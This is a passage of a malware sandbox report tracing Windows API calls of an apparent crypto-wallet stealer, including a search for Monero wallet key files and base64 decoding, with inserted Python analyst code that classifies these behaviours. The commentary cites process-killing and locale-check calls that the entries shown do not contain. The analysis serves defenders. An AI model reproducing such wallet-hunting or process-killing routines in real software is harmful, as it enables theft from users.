                            • Associated: 00000000.00000002.1739784378.0000000000649000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1739784378.0000000000658000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1743063334.0000000000659000.00000080.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1743548320.00000000007F7000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1743617264.00000000007F8000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_d0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: KeyboardLayoutListLocal$AllocFreeInfoLocalelstrcpy
                            • String ID: /
                            • API String ID: 3090951853-4001269591
                            • Opcode ID: 06bba5cec1c3548568694fec43c845d8982798ffb7c0ea9c46fbf48bbd103dfc
                            • Instruction ID: 3666616ef739bd1dd5d90877ad7dff66eee6b4f73f4d2e38586123b17ab09ba8
                            • Opcode Fuzzy Hash: 06bba5cec1c3548568694fec43c845d8982798ffb7c0ea9c46fbf48bbd103dfc
                            • Instruction Fuzzy Hash: FD416D71A40258AFCB24DB95DC99BEEB378FB48700F2041D9E10976292DB742F84CFA1
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1739784378.00000000003BA000.00000040.00000001.01000000.00000003.sdmp, Offset: 000D0000, based on PE: true
                            • Associated: 00000000.00000002.1739246388.00000000000D0000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1739272411.00000000000D1000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1739272411.00000000000FC000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1739272411.000000000020D000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1739272411.0000000000219000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1739272411.000000000023E000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1739272411.00000000003A6000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1739784378.0000000000544000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1739784378.0000000000620000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1739784378.0000000000642000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1739784378.0000000000649000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1739784378.0000000000658000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1743063334.0000000000659000.00000080.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1743548320.00000000007F7000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1743617264.00000000007F8000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_d0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID: $b$M[$~R]$#s$Cv/$Fsw$Y/$
                            • API String ID: 0-1072856351
                            • Opcode ID: ea76dc279ca529597350ee42fde27b7c2069127bc24327f1f0baef1b62d52652
                            • Instruction ID: 27cc61601cd0cc6d731ed543c73c44229de586cdd50cda56477e61d2ed3a711c
                            • Opcode Fuzzy Hash: ea76dc279ca529597350ee42fde27b7c2069127bc24327f1f0baef1b62d52652
                            • Instruction Fuzzy Hash: 1AB2E6F3A0C6009FE304AE29DC8567AFBE5EFD4720F16893DE6C583744EA3598418697
                            APIs
                              • Part of subcall function 000EAA50: lstrcpy.KERNEL32(000F0E1A,00000000), ref: 000EAA98
                              • Part of subcall function 000EAC30: lstrcpy.KERNEL32(00000000,?), ref: 000EAC82
                              • Part of subcall function 000EAC30: lstrcat.KERNEL32(00000000), ref: 000EAC92
                              • Part of subcall function 000EACC0: lstrlen.KERNEL32(?,00D49238,?,\Monero\wallet.keys,000F0E1A), ref: 000EACD5
                              • Part of subcall function 000EACC0: lstrcpy.KERNEL32(00000000), ref: 000EAD14
                              • Part of subcall function 000EACC0: lstrcat.KERNEL32(00000000,00000000), ref: 000EAD22
                              • Part of subcall function 000EABB0: lstrcpy.KERNEL32(?,000F0E1A), ref: 000EAC15
                            • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,\*.*,000F0D79), ref: 000DE5A2
                            • StrCmpCA.SHLWAPI(?,000F15F0), ref: 000DE5F2
                            • StrCmpCA.SHLWAPI(?,000F15F4), ref: 000DE608
                            • FindNextFileA.KERNEL32(000000FF,?), ref: 000DECDF
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1739272411.00000000000D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000D0000, based on PE: true
                            • Associated: 00000000.00000002.1739246388.00000000000D0000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1739272411.00000000000FC000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1739272411.000000000020D000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1739272411.0000000000219000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1739272411.000000000023E000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1739272411.00000000003A6000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1739784378.00000000003BA000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1739784378.0000000000544000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1739784378.0000000000620000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1739784378.0000000000642000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1739784378.0000000000649000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1739784378.0000000000658000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1743063334.0000000000659000.00000080.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1743548320.00000000007F7000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1743617264.00000000007F8000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_d0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpy$FileFindlstrcat$FirstNextlstrlen
                            • String ID: \*.*
                            • API String ID: 433455689-1173974218
                            • Opcode ID: a60307c2fecf898eb5e3f6e87212512bdcbd0152f2aa9d49051cfe2292d8a64e
                            • Instruction ID: 021e4cecaa5f178efd3a9f129be284a4c0c1bc71a18875d9fee61fdf70a3338b
                            • Opcode Fuzzy Hash: a60307c2fecf898eb5e3f6e87212512bdcbd0152f2aa9d49051cfe2292d8a64e
                            • Instruction Fuzzy Hash: 6D124C32B102589FCB14FB61DCA6AED7379AF59300F4145E9A50A76193EF307B48CB62
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1739784378.00000000003BA000.00000040.00000001.01000000.00000003.sdmp, Offset: 000D0000, based on PE: true
                            • Associated: 00000000.00000002.1739246388.00000000000D0000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1739272411.00000000000D1000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1739272411.00000000000FC000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1739272411.000000000020D000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1739272411.0000000000219000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1739272411.000000000023E000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1739272411.00000000003A6000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1739784378.0000000000544000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1739784378.0000000000620000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1739784378.0000000000642000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1739784378.0000000000649000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1739784378.0000000000658000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1743063334.0000000000659000.00000080.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1743548320.00000000007F7000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1743617264.00000000007F8000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_d0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID: Jbws$VA]$eHH$np[~$:}o$w/
                            • API String ID: 0-747602080
                            • Opcode ID: d6e5ab2183fe39bd2eb5ce497cf33023b9bc69a2b3e8b850acb489dd197875d4
                            • Instruction ID: 10dae7241d24d73260bf13da3b846b8a95028b9e1ecf82bf6678768071397b90
                            • Opcode Fuzzy Hash: d6e5ab2183fe39bd2eb5ce497cf33023b9bc69a2b3e8b850acb489dd197875d4
                            • Instruction Fuzzy Hash: 97B2F5F3A086009FE304AE2DEC8567ABBE9EF94720F1A493DE6C5C7344E63558458793
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1739784378.00000000003BA000.00000040.00000001.01000000.00000003.sdmp, Offset: 000D0000, based on PE: true
                            • Associated: 00000000.00000002.1739246388.00000000000D0000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1739272411.00000000000D1000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1739272411.00000000000FC000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1739272411.000000000020D000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1739272411.0000000000219000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1739272411.000000000023E000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1739272411.00000000003A6000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1739784378.0000000000544000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1739784378.0000000000620000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1739784378.0000000000642000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1739784378.0000000000649000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1739784378.0000000000658000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1743063334.0000000000659000.00000080.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1743548320.00000000007F7000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1743617264.00000000007F8000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_d0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID: 93ec$?_{$GUv$Wwe$l:.~$mG{o
                            • API String ID: 0-2175479145
                            • Opcode ID: 9bf8e51648ed2805823eb5d57a81d351ef99365770f25c55e08e0af5b6f0bd59
                            • Instruction ID: 1d1cdad1e3aa48462026cc4c9ca64d5a8709570bf08a54cea2973811abd96cba
                            • Opcode Fuzzy Hash: 9bf8e51648ed2805823eb5d57a81d351ef99365770f25c55e08e0af5b6f0bd59
                            • Instruction Fuzzy Hash: AEB24BF3A0C2049FE304AE2DEC8567AFBE9EF94720F16853DEAC4C7744E93558058696
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1739784378.00000000003BA000.00000040.00000001.01000000.00000003.sdmp, Offset: 000D0000, based on PE: true
                            • Associated: 00000000.00000002.1739246388.00000000000D0000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1739272411.00000000000D1000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1739272411.00000000000FC000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1739272411.000000000020D000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1739272411.0000000000219000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1739272411.000000000023E000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1739272411.00000000003A6000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1739784378.0000000000544000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1739784378.0000000000620000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1739784378.0000000000642000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1739784378.0000000000649000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1739784378.0000000000658000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1743063334.0000000000659000.00000080.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1743548320.00000000007F7000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1743617264.00000000007F8000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_d0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID: >Y_G$NZ/]$O}{$`26g$f4yy$Hw|
                            • API String ID: 0-3424757978
                            • Opcode ID: 9e5dc95fe84f556b82922c3ba7c2d86d092cab8d9e8a3867a9392db3f359ec1d
                            • Instruction ID: 6779f80ddd5d216ae58f28d6f188219221db26ded1e61a996e4cd36c1c0f49b8
                            • Opcode Fuzzy Hash: 9e5dc95fe84f556b82922c3ba7c2d86d092cab8d9e8a3867a9392db3f359ec1d
                            • Instruction Fuzzy Hash: 91A206F3A082049FE304AE2DEC8567AFBE5EF94720F1A893DE6C4C7744E63558058697
                            APIs
                            • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,>O,00000000,00000000), ref: 000DA23F
                            • LocalAlloc.KERNEL32(00000040,?,?,?,000D4F3E,00000000,?), ref: 000DA251
                            • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,>O,00000000,00000000), ref: 000DA27A
                            • LocalFree.KERNEL32(?,?,?,?,000D4F3E,00000000,?), ref: 000DA28F
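The four call chains in the entries above (the FindFirstFileA/FindNextFileA walk whose subcalls carry `\Monero\wallet.keys`, the CreateToolhelp32Snapshot/Process32First/Process32Next/OpenProcess/TerminateProcess loop, the GetKeyboardLayoutList/GetLocaleInfoA check behind the "may stop execution after checking locale" signature, and the paired CryptStringToBinaryA calls) only become readable once the hexadecimal arguments are decoded. The Python below is an added analyst helper, not part of the Joe Sandbox report and not code from the sample: it parses bullet lines copied verbatim from those entries, names the Windows SDK constants (0x2 = TH32CS_SNAPPROCESS, 0x1 = PROCESS_TERMINATE, 0x128 = 296 = sizeof(PROCESSENTRY32) in a 32-bit ANSI build, 0x2 = LOCALE_SLANGUAGE, 0x1 = CRYPT_STRING_BASE64, 0x40 = LMEM_ZEROINIT, which is LPTR) and tags each chain with the behaviour it implements. The entry labels, tag names and the subset of constants in the tables are the script's own choices; arguments the IDA plugin could not resolve appear in the report as `?` or as a raw address and are passed through unchanged.

```python
import re

# Constructed input: the "APIs" bullet lines of four entries above, copied verbatim
# (raw strings keep the backslashes of \Monero\wallet.keys and \*.*).
ENTRIES = {
    "file_walk": r"""
• Part of subcall function 000EACC0: lstrlen.KERNEL32(?,00D49238,?,\Monero\wallet.keys,000F0E1A), ref: 000EACD5
• FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,\*.*,000F0D79), ref: 000DE5A2
• FindNextFileA.KERNEL32(000000FF,?), ref: 000DECDF
""",
    "proc_kill": r"""
• CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 000E9905
• Process32First.KERNEL32(000D9FDE,00000128), ref: 000E9919
• Process32Next.KERNEL32(000D9FDE,00000128), ref: 000E992E
• StrCmpCA.SHLWAPI(?,000D9FDE), ref: 000E9943
• OpenProcess.KERNEL32(00000001,00000000,?), ref: 000E995C
• TerminateProcess.KERNEL32(00000000,00000000), ref: 000E997A
• CloseHandle.KERNEL32(00000000), ref: 000E9987
""",
    "locale": r"""
• GetKeyboardLayoutList.USER32(00000000,00000000,000F05B7), ref: 000E7D71
• LocalAlloc.KERNEL32(00000040,?), ref: 000E7D89
• GetKeyboardLayoutList.USER32(?,00000000), ref: 000E7D9D
• GetLocaleInfoA.KERNEL32(?,00000002,?,00000200), ref: 000E7DF2
""",
    "b64": r"""
• CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,>O,00000000,00000000), ref: 000DA23F
• LocalAlloc.KERNEL32(00000040,?,?,?,000D4F3E,00000000,?), ref: 000DA251
• CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,>O,00000000,00000000), ref: 000DA27A
""",
}
LINE_RE = re.compile(r"•\s*(?:Part of subcall function (?P<sub>[0-9A-F]+):\s*)?"
                     r"(?P<api>\w+)\.(?P<mod>\w+)\((?P<args>.*)\), ref: (?P<ref>[0-9A-F]+)")
# Windows SDK constants, keyed by (API, zero-based argument index); a subset chosen for this report.
FLAG_BITS = {  # bit masks
    ("CreateToolhelp32Snapshot", 0): {0x1: "TH32CS_SNAPHEAPLIST", 0x2: "TH32CS_SNAPPROCESS",
                                      0x4: "TH32CS_SNAPTHREAD", 0x8: "TH32CS_SNAPMODULE"},
    ("OpenProcess", 0): {0x1: "PROCESS_TERMINATE", 0x8: "PROCESS_VM_OPERATION", 0x10: "PROCESS_VM_READ",
                         0x20: "PROCESS_VM_WRITE", 0x400: "PROCESS_QUERY_INFORMATION"},
    ("LocalAlloc", 0): {0x2: "LMEM_MOVEABLE", 0x40: "LMEM_ZEROINIT"},  # LPTR == 0x40
}
ENUM_VALUES = {  # exact values, not masks
    ("CryptStringToBinaryA", 2): {0x0: "CRYPT_STRING_BASE64HEADER", 0x1: "CRYPT_STRING_BASE64",
                                  0x2: "CRYPT_STRING_BINARY", 0x4: "CRYPT_STRING_HEX"},
    ("GetLocaleInfoA", 1): {0x1: "LOCALE_ILANGUAGE", 0x2: "LOCALE_SLANGUAGE", 0x6: "LOCALE_SCOUNTRY"},
}

def decode_arg(api, idx, raw):
    """Name one logged argument; '?' and inline strings pass through unchanged."""
    try:
        value = int(raw, 16)
    except ValueError:
        return raw
    if (api, idx) in FLAG_BITS:
        bits = FLAG_BITS[(api, idx)]
        names = [name for bit, name in bits.items() if value & bit]
        rest = value & ~sum(bits)
        if rest or not names:
            names.append(f"0x{rest:x}")
        return "|".join(names)
    if (api, idx) in ENUM_VALUES:
        return ENUM_VALUES[(api, idx)].get(value, f"0x{value:x}")
    return f"0x{value:x}"

def parse_entry(text):
    """Turn one entry's bullet lines into call records with decoded arguments."""
    calls = []
    for m in LINE_RE.finditer(text):
        raw = [a.strip() for a in m["args"].split(",")]
        calls.append({"api": m["api"], "ref": m["ref"], "subcall": m["sub"] is not None,
                      "raw": raw, "args": [decode_arg(m["api"], i, a) for i, a in enumerate(raw)]})
    return calls

def classify(calls):
    """Tag the behaviour a chain implements; subcall lines contribute only their strings."""
    apis = {c["api"] for c in calls if not c["subcall"]}
    strings = [a for c in calls for a in c["raw"] if a != "?" and not re.fullmatch(r"[0-9A-F]+", a)]
    tags = []
    if {"CreateToolhelp32Snapshot", "Process32First", "Process32Next", "OpenProcess",
        "TerminateProcess"} <= apis:
        tags.append("process-kill-by-name")  # snapshot, compare szExeFile, terminate
    if any(c["api"] == "Process32First" and len(c["raw"]) > 1 and c["raw"][1] == "00000128" for c in calls):
        tags.append("processentry32-ansi-32bit")  # 0x128 = 9 DWORD-sized fields + szExeFile[260]
    if {"FindFirstFileA", "FindNextFileA"} <= apis:
        tags.append("directory-walk")
        if any("wallet" in s.lower() for s in strings):
            tags.append("wallet-file-hunt")
    if {"GetKeyboardLayoutList", "GetLocaleInfoA"} <= apis:
        tags.append("locale-check")
    b64 = [c for c in calls if c["api"] == "CryptStringToBinaryA" and c["args"][2] == "CRYPT_STRING_BASE64"]
    if b64:
        tags.append("base64-decode")
        if len(b64) == 2 and b64[0]["args"][3] == "0x0":  # pbBinary NULL first: size query, then decode
            tags.append("size-query-then-decode")
    return tags

if __name__ == "__main__":
    for label, text in ENTRIES.items():
        print(label, classify(parse_entry(text)))
```

Two checks worth taking from the decoded output: the OpenProcess call asks for PROCESS_TERMINATE only and is followed by TerminateProcess, so this chain is a kill-by-name loop over the snapshot's szExeFile, not an injection primitive; and the two CryptStringToBinaryA calls around a LocalAlloc are the usual size-query idiom (first call with pbBinary NULL to learn the byte count, then decode into the fresh buffer). The plugin logs 00000000 for pbBinary in both calls, so the script infers the idiom from the decode/alloc/decode order rather than from the pointer value.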
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1739272411.00000000000D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000D0000, based on PE: true
                            • Associated: 00000000.00000002.1739246388.00000000000D0000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1739272411.00000000000FC000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1739272411.000000000020D000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1739272411.0000000000219000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1739272411.000000000023E000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1739272411.00000000003A6000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1739784378.00000000003BA000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1739784378.0000000000544000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1739784378.0000000000620000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1739784378.0000000000642000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1739784378.0000000000649000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1739784378.0000000000658000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1743063334.0000000000659000.00000080.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1743548320.00000000007F7000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1743617264.00000000007F8000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_d0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: BinaryCryptLocalString$AllocFree
                            • String ID: >O
                            • API String ID: 4291131564-3638836991
                            • Opcode ID: 7cd74d85232c7b2500703f4be33deca1c3f16a7e3c140e2ebf7431b94e17e406
                            • Instruction ID: df45c855a789dbb11d13a4bf196981126b15671621c046414741ac8fc5bd69ad
                            • Opcode Fuzzy Hash: 7cd74d85232c7b2500703f4be33deca1c3f16a7e3c140e2ebf7431b94e17e406
                            • Instruction Fuzzy Hash: C511A474240308AFEB11CF64CC95FAA77B9EB89B10F208459FD159B390C7B2A941CB90
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1739784378.00000000003BA000.00000040.00000001.01000000.00000003.sdmp, Offset: 000D0000, based on PE: true
                             • Associated: 00000000.00000002.1739246388.00000000000D0000.00000004.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1739272411.00000000000D1000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1739272411.00000000000FC000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1739272411.000000000020D000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1739272411.0000000000219000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1739272411.000000000023E000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1739272411.00000000003A6000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1739784378.0000000000544000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1739784378.0000000000620000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1739784378.0000000000642000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1739784378.0000000000649000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1739784378.0000000000658000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1743063334.0000000000659000.00000080.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1743548320.00000000007F7000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1743617264.00000000007F8000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_d0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID: 6uw$b~F$r_$d${ ;^$[}?
                            • API String ID: 0-3414453374
                            • Opcode ID: c3ce10dc2a38f8e1c2d0fbe6a3d752d8900e85e5e74fc061d78ac95e932131d9
                            • Instruction ID: a8f58cb285829426c720c677289c3f1ff0ecd98ab879364f1ae8dde57c070cdc
                            • Opcode Fuzzy Hash: c3ce10dc2a38f8e1c2d0fbe6a3d752d8900e85e5e74fc061d78ac95e932131d9
                            • Instruction Fuzzy Hash: 34B205F360C2049FE3046E2DEC8567ABBE9EF94320F1A493DE6C4C7744EA3598458697
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1739272411.00000000000FC000.00000040.00000001.01000000.00000003.sdmp, Offset: 000D0000, based on PE: true
                             • Associated: 00000000.00000002.1739246388.00000000000D0000.00000004.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1739272411.00000000000D1000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1739272411.000000000020D000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1739272411.0000000000219000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1739272411.000000000023E000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1739272411.00000000003A6000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1739784378.00000000003BA000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1739784378.0000000000544000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1739784378.0000000000620000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1739784378.0000000000642000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1739784378.0000000000649000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1739784378.0000000000658000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1743063334.0000000000659000.00000080.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1743548320.00000000007F7000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1743617264.00000000007F8000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_d0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID: \u$\u${${$}$}
                            • API String ID: 0-582841131
                            • Opcode ID: 27d9cd0be1a73f01c92297f6708ad4a9299737c53231bb6b8c18bba91e257b74
                            • Instruction ID: 59f492af5010eb569ce932ab0bce47fbe12dd32a06842012de7b9f5f99b60c5b
                            • Opcode Fuzzy Hash: 27d9cd0be1a73f01c92297f6708ad4a9299737c53231bb6b8c18bba91e257b74
                            • Instruction Fuzzy Hash: BE419F12E19BD9C5CB058B7444A02AEBFB22FE6210F6D82EEC4DD1F382C774414AD3A5
                            APIs
                            • lstrlen.KERNEL32(?,00000001,?,00000000,00000000,00000000), ref: 000DC971
                            • CryptStringToBinaryA.CRYPT32(?,00000000), ref: 000DC97C
                            • lstrcat.KERNEL32(?,000F0B47), ref: 000DCA43
                            • lstrcat.KERNEL32(?,000F0B4B), ref: 000DCA57
                            • lstrcat.KERNEL32(?,000F0B4E), ref: 000DCA78
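The two CryptStringToBinaryA calls at 000DA23F and 000DA27A (size query, LocalAlloc with LPTR=0x40, decode, LocalFree) and the single call at 000DC97C all pass dwFlags=00000001, which is CRYPT_STRING_BASE64: the input is plain base64 text. The Python below is an added analyst example, not code from this report or from the sample; it models that two-call contract and applies it to a constructed byte buffer standing in for a memory dump so candidate strings can be recovered offline. The function names, the regular expression and the sample buffer are this example's own, and what the sample does with the decoded bytes after these calls is not recorded in the listings above.

```python
import base64
import binascii
import re

CRYPT_STRING_BASE64 = 0x1  # dwFlags=00000001 in the CryptStringToBinaryA calls above


def crypt_string_to_binary(text, flags, out):
    """Model of CryptStringToBinaryA's two-call contract for CRYPT_STRING_BASE64.

    First call (out is None): return the decoded size, 0 on failure.
    Second call (out is a bytearray of that size): fill it, return bytes written.
    """
    if flags != CRYPT_STRING_BASE64:
        raise NotImplementedError("only CRYPT_STRING_BASE64 is modelled here")
    try:
        raw = base64.b64decode(text, validate=True)
    except binascii.Error:
        return 0
    if out is None:
        return len(raw)
    if len(out) < len(raw):
        return 0
    out[:len(raw)] = raw
    return len(raw)


def decode_like_sample(text):
    """Same sequence as 000DA23F..000DA28F: size query, LocalAlloc, decode, LocalFree."""
    size = crypt_string_to_binary(text, CRYPT_STRING_BASE64, None)
    if size == 0:
        return None
    buf = bytearray(size)  # LocalAlloc(LPTR=0x40, size): fixed, zero-initialised buffer
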